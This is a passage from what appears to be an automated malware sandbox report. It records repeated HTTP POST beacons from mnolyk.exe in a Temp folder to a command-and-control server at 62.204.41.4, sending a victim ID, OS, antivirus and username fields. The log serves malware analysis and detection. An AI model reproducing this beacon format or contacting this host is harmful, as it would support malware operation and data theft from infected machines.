                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:19.134325981 CET624INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      51192.168.2.74974662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:13.923683882 CET166OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:13.987709045 CET166INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      510192.168.2.75020562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:19.325526953 CET625OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:19.390074968 CET625INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      511192.168.2.75020662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:19.556588888 CET626OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:19.621167898 CET626INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      512192.168.2.75020762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:19.807801962 CET627OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:19.874517918 CET627INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      513192.168.2.75020862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:20.046231031 CET628OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:20.115149975 CET628INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      514192.168.2.75020962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:20.298654079 CET629OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:20.363478899 CET629INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      515192.168.2.75021062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:20.545993090 CET630OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:20.609539986 CET630INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      516192.168.2.75021162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:20.794111013 CET631OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:20.859153032 CET631INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      517192.168.2.75021262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:21.026369095 CET632OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:21.091089010 CET632INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      518192.168.2.75021362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:21.269830942 CET633OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:21.333647966 CET633INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      519192.168.2.75021462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:21.511863947 CET634OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:21.577199936 CET634INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      52192.168.2.74974762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:14.171173096 CET167OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:14.233777046 CET167INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      520192.168.2.75021562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:21.772161961 CET635OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:21.834883928 CET635INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      521192.168.2.75021662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:22.010257959 CET636OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:22.076227903 CET636INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      522192.168.2.75021762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:22.244328976 CET637OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:22.307096004 CET637INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      523192.168.2.75021862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:22.479535103 CET638OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:22.542292118 CET638INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      524192.168.2.75021962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:22.722186089 CET639OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:22.784706116 CET639INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      525192.168.2.75022062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:22.982034922 CET640OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:23.048352957 CET640INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      526192.168.2.75022162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:23.231200933 CET641OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:23.295761108 CET641INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
